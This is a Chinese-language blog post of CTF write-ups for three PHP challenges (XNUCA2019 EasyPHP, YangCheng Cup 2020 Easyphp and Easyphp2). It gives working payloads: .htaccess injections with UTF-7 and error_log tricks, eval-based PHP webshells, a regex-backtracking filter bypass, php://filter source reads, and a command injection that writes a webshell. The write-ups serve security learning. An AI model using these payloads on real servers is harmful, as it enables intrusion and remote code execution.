

<!DOCTYPE html>
<html lang="en" data-default-color-scheme=&#34;auto&#34;>



<head>
  <meta charset="UTF-8">
  <link rel="apple-touch-icon" sizes="76x76" href="/img/favicon.png">
  <link rel="icon" type="image/png" href="/img/favicon.png">
  <meta name="viewport"
        content="width=device-width, initial-scale=1.0, maximum-scale=1.0, user-scalable=no, shrink-to-fit=no">
  <meta http-equiv="x-ua-compatible" content="ie=edge">
  
  <meta name="theme-color" content="#2f4154">
  <meta name="description" content="">
  <meta name="author" content="Yu ting">
  <meta name="keywords" content="">
  <title>buu（八） - Fearless&#39;s blog</title>

  <link  rel="stylesheet" href="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/css/bootstrap.min.css" />


  <link  rel="stylesheet" href="https://cdn.staticfile.org/github-markdown-css/4.0.0/github-markdown.min.css" />
  <link  rel="stylesheet" href="/lib/hint/hint.min.css" />

  
    
    
      
      <link  rel="stylesheet" href="https://cdn.staticfile.org/highlight.js/10.1.2/styles/github-gist.min.css" />
    
  

  
    <link  rel="stylesheet" href="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.css" />
  



<!-- 主题依赖的图标库，不要自行修改 -->

<link rel="stylesheet" href="//at.alicdn.com/t/font_1749284_ba1fz6golrf.css">



<link rel="stylesheet" href="//at.alicdn.com/t/font_1736178_kmeydafke9r.css">


<link  rel="stylesheet" href="/css/main.css" />

<!-- 自定义样式保持在最底部 -->


  <script id="fluid-configs">
    var Fluid = window.Fluid || {};
    var CONFIG = {"hostname":"fearless0923.github.io","root":"/","version":"1.8.5","typing":{"enable":true,"typeSpeed":70,"cursorChar":"_","loop":false},"toc":{"enable":true,"headingSelector":"h1,h2,h3,h4,h5,h6","collapseDepth":0},"anchorjs":{"enable":true,"element":"h1,h2,h3,h4,h5,h6","placement":"right","visible":"hover","icon":""},"copy_btn":true,"image_zoom":{"enable":true},"lazyload":{"enable":true,"onlypost":false},"web_analytics":{"enable":false,"baidu":null,"google":null,"gtag":null,"tencent":{"sid":null,"cid":null},"woyaola":null,"cnzz":null,"leancloud":{"app_id":null,"app_key":null,"server_url":null}}};
  </script>
  <script  src="/js/utils.js" ></script>
  <script  src="/js/color-schema.js" ></script>
<meta name="generator" content="Hexo 5.2.0"><link rel="alternate" href="/atom.xml" title="Fearless's blog" type="application/atom+xml">
</head>


<body>
  <header style="height: 70vh;">
    <nav id="navbar" class="navbar fixed-top  navbar-expand-lg navbar-dark scrolling-navbar">
  <div class="container">
    <a class="navbar-brand"
       href="/">&nbsp;<strong>Fluid</strong>&nbsp;</a>

    <button id="navbar-toggler-btn" class="navbar-toggler" type="button" data-toggle="collapse"
            data-target="#navbarSupportedContent"
            aria-controls="navbarSupportedContent" aria-expanded="false" aria-label="Toggle navigation">
      <div class="animated-icon"><span></span><span></span><span></span></div>
    </button>

    <!-- Collapsible content -->
    <div class="collapse navbar-collapse" id="navbarSupportedContent">
      <ul class="navbar-nav ml-auto text-center">
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/">
                <i class="iconfont icon-home-fill"></i>
                Home
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/archives/">
                <i class="iconfont icon-archive-fill"></i>
                Archives
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/categories/">
                <i class="iconfont icon-category-fill"></i>
                Categories
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/tags/">
                <i class="iconfont icon-tags-fill"></i>
                Tags
              </a>
            </li>
          
        
          
          
          
          
            <li class="nav-item">
              <a class="nav-link" href="/about/">
                <i class="iconfont icon-user-fill"></i>
                About
              </a>
            </li>
          
        
        
          <li class="nav-item" id="search-btn">
            <a class="nav-link" data-toggle="modal" data-target="#modalSearch">&nbsp;<i
                class="iconfont icon-search"></i>&nbsp;</a>
          </li>
        
        
          <li class="nav-item" id="color-toggle-btn">
            <a class="nav-link" href="javascript:">&nbsp;<i
                class="iconfont icon-dark" id="color-toggle-icon"></i>&nbsp;</a>
          </li>
        
      </ul>
    </div>
  </div>
</nav>

    <div class="banner intro-2" id="background" parallax=true
         style="background: url('/img/default.png') no-repeat center center;
           background-size: cover;">
      <div class="full-bg-img">
        <div class="mask flex-center" style="background-color: rgba(0, 0, 0, 0.3)">
          <div class="page-header text-center fade-in-up">
            <span class="h2" id="subtitle" title="buu（八）">
              
            </span>

            
              <div class="mt-3">
  
  
    <span class="post-meta">
      <i class="iconfont icon-date-fill" aria-hidden="true"></i>
      <time datetime="2021-08-11 17:03" pubdate>
        August 11, 2021 pm
      </time>
    </span>
  
</div>

<div class="mt-1">
  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-chart"></i>
      1.4k 字
    </span>
  

  
    
    <span class="post-meta mr-2">
      <i class="iconfont icon-clock-fill"></i>
      
      
      19
       分钟
    </span>
  

  
  
</div>

            
          </div>

          
        </div>
      </div>
    </div>
  </header>

  <main>
    
      

<div class="container-fluid">
  <div class="row">
    <div class="d-none d-lg-block col-lg-2"></div>
    <div class="col-lg-8 nopadding-md">
      <div class="container nopadding-md" id="board-ctn">
        <div class="py-5" id="board">
          <article class="post-content mx-auto">
            <!-- SEO header -->
            <h1 style="display: none">buu（八）</h1>
            
            <div class="markdown-body">
              <h1>[XNUCA2019Qualifier]EasyPHP</h1>
<h4 id="分析源码"><a class="header-anchor" href="#分析源码">🍭</a>分析源码</h4>
<p><img src="/2021/08/11/ffi/2.png" srcset="/img/loading.gif" alt="2"></p>
<p>题目服务器中间件为 Apache，因此可以传 .htaceess 利用自定义错误文件写Webshell。</p>
<h5 id="使-htaccess-生效"><a class="header-anchor" href="#使-htaccess-生效">🍭</a>使 .htaccess 生效</h5>
<p>我们写入的内容会被自动在末尾加上“\nJust one chance”，会使上传的.htaccess文件不生效，我们可以采用 <code>\</code> 的方式将换行符转义成普通字符，然后用 <code>#</code> 来注释单行：</p>
<pre><code class="hljs javascript">......# \\nJust one chance</code></pre>
<h5 id="include-path"><a class="header-anchor" href="#include-path">🍭</a>include_path</h5>
<p>在题目的代码中有一处 <code>include_once(&quot;fl3g.php&quot;);</code>，但是当我们访问fl3g.php文件时却发现该文件并不存在，这里便用到了php.ini中的include_path选项。</p>
<p>include_path可以用来设置include()或require()函数包含文件的参考目录路径，也就是说当使用include()或require()函数包含文件的时候，程序首先以include_path设置的路径作为参考点去找文件，如果找不到，则以程序自身所在的路径为参考点去找所要的文件，如果都找不到，则出错，那么我们就可以通过修改它来控制include的路径，那么如果我们能够在其它目录写入同名的fl3g.php让其包含，那么就能够getshell，并且可以使fl3g.php文件不被删除。</p>
<h5 id="指定目录写文件（error-log）"><a class="header-anchor" href="#指定目录写文件（error-log）">🍭</a>指定目录写文件（error_log）</h5>
<p>前面我们已经了解了，error_log 可以将 PHP 运行报错的记录写到指定文件中，利用这一点我们可以写Webshell。但是如何触发报错呢？这就是为什么代码中写了一处不存在的fl3g.php的原因。我们可以将include_path的内容设置成payload的内容，这时访问页面，页面尝试将 payload 作为一个路径去访问时就会因为找不到fl3g.php而报错，并将报错记录在指定的错误文件中。</p>
<p>但是前面也说了，当我们传递 PHP 的 payload 时，因为我们传过去的内容会经过 html 编码，所以我们需要用 UTF-7 来绕过：</p>
<pre><code class="hljs javascript">php_value include_path &quot;+ADw?php eval(+ACQAXw-POST+AFs-whoami+AF0)+ADs?+AD4-&quot;php_value error_log /tmp/fl3g.php# \</code></pre>
<h4 id="解题"><a class="header-anchor" href="#解题">🍭</a>解题</h4>
<p>写入 .htaccess error_log 相关的配置，将 payload 写入目标文件</p>
<p>将构造的payload进行url编码并执行</p>
<pre><code class="hljs angelscript">/index.php?filename=.htaccess&amp;content=php_value%<span class="hljs-number">20</span>include_path%<span class="hljs-number">20</span>%<span class="hljs-number">22</span>%<span class="hljs-number">2</span>BADw%<span class="hljs-number">3</span>Fphp%<span class="hljs-number">20</span>eval(%<span class="hljs-number">2</span>BACQAXw-POST%<span class="hljs-number">2</span>BAFs-whoami%<span class="hljs-number">2</span>BAF0)%<span class="hljs-number">2</span>BADs%<span class="hljs-number">3</span>F%<span class="hljs-number">2</span>BAD4-%<span class="hljs-number">22</span>%<span class="hljs-number">0</span>Aphp_value%<span class="hljs-number">20</span>error_log%<span class="hljs-number">20</span>%<span class="hljs-number">2</span>Ftmp%<span class="hljs-number">2</span>Ffl3g.php%<span class="hljs-number">0</span>A%<span class="hljs-number">23</span>%<span class="hljs-number">20</span>%<span class="hljs-number">5</span>C</code></pre>
<p>然后访问 index.php 触发报错留下 error_log。再写入 .htaccess 新的配置，将 include_path 选项设定为刚才生成的fl3g.php的目录,并配置解析的编码为 UTF-7：</p>
<pre><code class="hljs apache"><span class="hljs-attribute">php_value</span> include_path <span class="hljs-string">&quot;/tmp&quot;</span>php_fl\    # 这里使用\加换行的方式绕过对<span class="hljs-string">&quot;flag&quot;</span>的过滤, 即php_flag zend.multibyte <span class="hljs-number">1</span>ag zend.multibyte <span class="hljs-number">1</span>php_value zend.script_encoding <span class="hljs-string">&quot;UTF-7&quot;</span># \</code></pre>
<p>url编码后执行：</p>
<pre><code class="hljs angelscript">/index.php?filename=.htaccess&amp;content=php_value%<span class="hljs-number">20</span>include_path%<span class="hljs-number">20</span>%<span class="hljs-number">22</span>%<span class="hljs-number">2</span>Ftmp%<span class="hljs-number">22</span>%<span class="hljs-number">0</span>Aphp_fl%<span class="hljs-number">5</span>C%<span class="hljs-number">0</span>Aag%<span class="hljs-number">20</span>zend.multibyte%<span class="hljs-number">201</span>%<span class="hljs-number">0</span>Aphp_value%<span class="hljs-number">20</span>zend.script_encoding%<span class="hljs-number">20</span>%<span class="hljs-number">22</span>UTF<span class="hljs-number">-7</span>%<span class="hljs-number">22</span>%<span class="hljs-number">0</span>A%<span class="hljs-number">23</span>%<span class="hljs-number">20</span>%<span class="hljs-number">5</span>C</code></pre>
<p>读取flag：</p>
<p><img src="/2021/08/11/ffi/3.png" srcset="/img/loading.gif" alt="3"></p>
<p>解二：包含 .htaccess 自身的方法Getshell:</p>
<pre><code class="hljs php-template"><span class="xml">php_value auto_prepend_fi\le &quot;.htaccess&quot;#</span><span class="php"><span class="hljs-meta">&lt;?php</span> @<span class="hljs-keyword">eval</span>($_GET[<span class="hljs-string">&#x27;cmd&#x27;</span>]); <span class="hljs-meta">?&gt;</span></span><span class="xml">\</span></code></pre>
<p>因为后面会拼接字符串， 采用.htaccess的单行注释绕过 # \，这里反斜杠本来就有拼接上下两行的功能，因此这里本来就可以直接使用\来连接被过滤掉的关键字来写入.htaccess</p>
<img src="/2021/08/11/ffi/7.png" srcset="/img/loading.gif" alt="7" style="zoom:50%;">
<p>解三：正则回朔绕过正则匹配</p>
<pre><code class="hljs angelscript">php_value pcre.backtrack_limit <span class="hljs-number">0</span>
php_value pcre.jit <span class="hljs-number">0</span></code></pre>
<p><code>if(preg_match(&quot;/[^a-z\.]/&quot;, $filename) == 1)</code> 而不是<code>if(preg_match(&quot;/[^a-z\.]/&quot;, $filename) !== 0)</code>，因此可以通过php_value 设置正则回朔次数来使正则匹配的结果返回为false而不是0或1，默认的回朔次数比较大，可以设成0，那么当超过此次数以后将返回false。//绕过filename的过滤直接写shell</p>
<p>payload</p>
<pre><code class="hljs php-template"><span class="xml">php_value pcre.backtrack_limit    0</span>
<span class="xml">php_value auto_append_file    &quot;.htaccess&quot;</span>
<span class="xml">php_value pcre.jit   0</span>
<span class="xml">#aa</span><span class="php"><span class="hljs-meta">&lt;?php</span> <span class="hljs-keyword">eval</span>($_GET[<span class="hljs-string">&#x27;a&#x27;</span>]);<span class="hljs-meta">?&gt;</span></span><span class="xml">\</span></code></pre>
<p>filename=php://filter/write=convert.base64-decode/resource=.htaccess// content绕过stristr，然后getshell。</p>
<h1>[羊城杯 2020]Easyphp</h1>
<p>题目给了源码，跟[XNUCA2019Qualifier]EasyPHP一样，只不过少了<code>include_once(&quot;fl3g.php&quot;);</code>，将payload一的include_path去掉，就可以用在这一题，payload2,3同理可用</p>
<p><img src="/2021/08/11/ffi/6.png" srcset="/img/loading.gif" alt="6"></p>
<p>也可以直接传一句话，因为这题没有include_once</p>
<h1>[羊城杯 2020]Easyphp2</h1>
<p>进入题目页面，发现url<code>/?file=GWHT.php</code>,应该是文件包含，尝试伪协议读取，发现base64和rot13都被ban掉，但<code>convert.quoted-printable-encode</code>没ban，读取文件：</p>
<pre><code class="hljs awk">?file=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/read=convert.quoted-printable-encode/</span>resource=GWHT.php</code></pre>
<p>1<img src="/2021/08/11/ffi/4.png" srcset="/img/loading.gif" alt="4" style="zoom: 33%;"></p>
<p>也可以用base编码，url两次编码即可绕过限制：</p>
<pre><code class="hljs awk">?file=php:<span class="hljs-regexp">//</span>filter<span class="hljs-regexp">/convert.%6%32ase64-encode/</span>resource=GWHT.php</code></pre>
<p>解码后整理一下有用的代码：</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
   ini_set(<span class="hljs-string">&#x27;max_execution_time&#x27;</span>, <span class="hljs-number">5</span>);

   <span class="hljs-keyword">if</span> ($_COOKIE[<span class="hljs-string">&#x27;pass&#x27;</span>] !== getenv(<span class="hljs-string">&#x27;PASS&#x27;</span>)) &#123;
       setcookie(<span class="hljs-string">&#x27;pass&#x27;</span>, <span class="hljs-string">&#x27;PASS&#x27;</span>);
       <span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;&lt;h2&gt;&#x27;</span>.<span class="hljs-string">&#x27;&lt;hacker&gt;&#x27;</span>.<span class="hljs-string">&#x27;&lt;h2&gt;&#x27;</span>.<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>.<span class="hljs-string">&#x27;&lt;h1&gt;&#x27;</span>.<span class="hljs-string">&#x27;404&#x27;</span>.<span class="hljs-string">&#x27;&lt;h1&gt;&#x27;</span>.<span class="hljs-string">&#x27;&lt;br&gt;&#x27;</span>.<span class="hljs-string">&#x27;Sorry, only people from GWHT are allowed to access this website.&#x27;</span>.<span class="hljs-string">&#x27;23333&#x27;</span>);
   &#125;
   <span class="hljs-meta">?&gt;</span>

   <span class="hljs-meta">&lt;?php</span>
   <span class="hljs-keyword">if</span> (<span class="hljs-keyword">isset</span>($_GET[<span class="hljs-string">&quot;count&quot;</span>])) &#123;
       $count = $_GET[<span class="hljs-string">&quot;count&quot;</span>];
       <span class="hljs-keyword">if</span>(preg_match(<span class="hljs-string">&#x27;/;|base64|rot13|base32|base16|&lt;\?php|#/i&#x27;</span>, $count))&#123;
       	<span class="hljs-keyword">die</span>(<span class="hljs-string">&#x27;hacker!&#x27;</span>);
       &#125;
       <span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;&lt;h2&gt;The Count is: &quot;</span> . exec(<span class="hljs-string">&#x27;printf \&#x27;&#x27;</span> . $count . <span class="hljs-string">&#x27;\&#x27; | wc -c&#x27;</span>) . <span class="hljs-string">&quot;&lt;/h2&gt;&quot;</span>;
   &#125;
   <span class="hljs-meta">?&gt;</span></code></pre>
<p>先判断cookie，GET传count参数；设置了一个执行时间，需要得到环境变量的值；robots.txt得到提示读check：</p>
<pre><code class="hljs php"><span class="hljs-meta">&lt;?php</span>
$pass = <span class="hljs-string">&quot;GWHT&quot;</span>;
<span class="hljs-comment">// Cookie password.</span>
<span class="hljs-keyword">echo</span> <span class="hljs-string">&quot;Here is nothing, isn&#x27;t it ?&quot;</span>;

header(<span class="hljs-string">&#x27;Location: /&#x27;</span>);</code></pre>
<p>得到密码，命令执行exec(‘printf ‘’ . $count . ‘’ | wc -c’)，exec命令无回显，可以直接写入shell：</p>
<pre><code class="hljs mojolicious"><span class="xml">?file=GWHT.php&amp;count=&#x27;|echo+&quot;<span class="hljs-tag">&lt;<span class="hljs-name">%</span></span></span><span class="perl"><span class="hljs-number">3</span>f%3d+<span class="hljs-keyword">eval</span>(\$_POST[<span class="hljs-string">&#x27;shell&#x27;</span>])%3f&gt;<span class="hljs-string">&quot;+&gt;+a.php&#x27;</span></span></code></pre>
<p>连接蚁剑，<code>find / -name &quot;flag*&quot;</code>找到flag路径，权限问题读不了/GWHT/system/of/a/down/flag.txt，在README里面有个hash，MD5解码为GWHTCTF，</p>
<p><img src="/2021/08/11/ffi/5.png" srcset="/img/loading.gif" alt="5"></p>
<p>参考：<a target="_blank" rel="noopener" href="https://www.cnblogs.com/twosmi1e/p/14230691.html#">https://www.cnblogs.com/twosmi1e/p/14230691.html#</a></p>

            </div>
            <hr>
            <div>
              <div class="post-metas mb-3">
                
                
                  <div class="post-meta">
                    <i class="iconfont icon-tags"></i>
                    
                      <a class="hover-with-bg" href="/tags/htaccess/">.htaccess</a>
                    
                  </div>
                
              </div>
              
                <p class="note note-warning">本博客所有文章除特别声明外，均采用 <a target="_blank" href="https://creativecommons.org/licenses/by-sa/4.0/deed.zh" rel="nofollow noopener noopener">CC BY-SA 4.0 协议</a> ，转载请注明出处！</p>
              
              
                <div class="post-prevnext row">
                  <article class="post-prev col-6">
                    
                    
                      <a href="/2021/08/13/ff/">
                        <i class="iconfont icon-arrowleft"></i>
                        <span class="hidden-mobile">Bypass Disable Function（一）</span>
                        <span class="visible-mobile">Previous</span>
                      </a>
                    
                  </article>
                  <article class="post-next col-6">
                    
                    
                      <a href="/2021/08/10/hta/">
                        <span class="hidden-mobile">.htaccess总结</span>
                        <span class="visible-mobile">Next</span>
                        <i class="iconfont icon-arrowright"></i>
                      </a>
                    
                  </article>
                </div>
              
            </div>

            
          </article>
        </div>
      </div>
    </div>
    
      <div class="d-none d-lg-block col-lg-2 toc-container" id="toc-ctn">
        <div id="toc">
  <p class="toc-header"><i class="iconfont icon-list"></i>&nbsp;TOC</p>
  <div class="toc-body" id="toc-body"></div>
</div>

      </div>
    
  </div>
</div>

<!-- Custom -->


    

    
      <a id="scroll-top-button" href="#" role="button">
        <i class="iconfont icon-arrowup" aria-hidden="true"></i>
      </a>
    

    
      <div class="modal fade" id="modalSearch" tabindex="-1" role="dialog" aria-labelledby="ModalLabel"
     aria-hidden="true">
  <div class="modal-dialog modal-dialog-scrollable modal-lg" role="document">
    <div class="modal-content">
      <div class="modal-header text-center">
        <h4 class="modal-title w-100 font-weight-bold">Search</h4>
        <button type="button" id="local-search-close" class="close" data-dismiss="modal" aria-label="Close">
          <span aria-hidden="true">&times;</span>
        </button>
      </div>
      <div class="modal-body mx-3">
        <div class="md-form mb-5">
          <input type="text" id="local-search-input" class="form-control validate">
          <label data-error="x" data-success="v"
                 for="local-search-input">keyword</label>
        </div>
        <div class="list-group" id="local-search-result"></div>
      </div>
    </div>
  </div>
</div>
    

    
  </main>

  <footer class="text-center mt-5 py-3">
  <div class="footer-content">
     <a href="https://hexo.io" target="_blank" rel="nofollow noopener"><span>Hexo</span></a> <i class="iconfont icon-love"></i> <a href="https://github.com/fluid-dev/hexo-theme-fluid" target="_blank" rel="nofollow noopener"><span>Fluid</span></a> 
  </div>
  

  

  
</footer>

<!-- SCRIPTS -->

  <script  src="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.js" ></script>
  <link  rel="stylesheet" href="https://cdn.staticfile.org/nprogress/0.2.0/nprogress.min.css" />

  <script>
    NProgress.configure({"showSpinner":false,"trickleSpeed":200})
    NProgress.start()
    document.addEventListener('DOMContentLoaded', function() {
      window.NProgress && window.NProgress.inc();
    })
    window.addEventListener('load', function() {
      NProgress.done();
    })
  </script>


<script  src="https://cdn.staticfile.org/jquery/3.5.1/jquery.min.js" ></script>
<script  src="https://cdn.staticfile.org/twitter-bootstrap/4.5.3/js/bootstrap.min.js" ></script>
<script  src="/js/debouncer.js" ></script>
<script  src="/js/events.js" ></script>
<script  src="/js/plugins.js" ></script>

<!-- Plugins -->


  
    <script  src="/js/lazyload.js" ></script>
  



  



  <script  src="https://cdn.staticfile.org/tocbot/4.12.0/tocbot.min.js" ></script>



  <script  src="https://cdn.staticfile.org/fancybox/3.5.7/jquery.fancybox.min.js" ></script>



  <script  src="https://cdn.staticfile.org/anchor-js/4.3.0/anchor.min.js" ></script>



  <script defer src="https://cdn.staticfile.org/clipboard.js/2.0.6/clipboard.min.js" ></script>





  <script  src="https://cdn.staticfile.org/typed.js/2.0.11/typed.min.js" ></script>
  <script>
    (function (window, document) {
      var typing = Fluid.plugins.typing;
      var title = document.getElementById('subtitle').title;
      
      typing(title)
      
    })(window, document);
  </script>



  <script  src="/js/local-search.js" ></script>
  <script>
    (function () {
      var path = "/local-search.xml";
      var inputArea = document.querySelector("#local-search-input");
      inputArea.onclick = function () {
        searchFunc(path, 'local-search-input', 'local-search-result');
        this.onclick = null
      }
    })()
  </script>















<!-- 主题的启动项 保持在最底部 -->
<script  src="/js/boot.js" ></script>



</body>
</html>
